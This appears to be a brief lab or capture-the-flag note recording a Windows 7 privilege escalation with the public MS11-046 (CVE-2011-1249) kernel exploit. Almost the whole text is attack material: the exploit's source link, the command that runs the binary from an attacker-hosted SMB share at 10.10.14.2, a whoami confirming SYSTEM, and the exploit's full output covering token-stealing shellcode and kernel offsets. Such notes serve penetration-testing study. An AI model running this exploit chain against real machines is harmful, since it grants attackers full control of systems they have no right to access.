4 privesc_2 ms11-046
Using https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046
c:\Users\Public\Downloads> \\10.10.14.2\drive\MS11-046.exe
c:\Windows\System32> whoami
nt authority\system
exit
# The exploit's status output below is only displayed after the spawned SYSTEM shell exits
[*] MS11-046 (CVE-2011-1249) x86 exploit
[*] by Tomislav Paskalev
[*] Identifying OS
[+] 32-bit
[+] Windows 7
[*] Locating required OS components
[+] ntkrnlpa.exe
[*] Address: 0x8281b000
[*] Offset: 0x00850000
[+] HalDispatchTable
[*] Offset: 0x009793b8
[+] NtQueryIntervalProfile
[*] Address: 0x77535510
[+] ZwDeviceIoControlFile
[*] Address: 0x77534ca0
[*] Setting up exploitation prerequisite
[*] Initialising Winsock DLL
[+] Done
[*] Creating socket
[+] Done
[*] Connecting to closed port
[+] Done
[*] Creating token stealing shellcode
[*] Shellcode assembled
[*] Allocating memory
[+] Address: 0x02070000
[*] Shellcode copied
[*] Exploiting vulnerability
[*] Sending AFD socket connect request
[+] Done
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell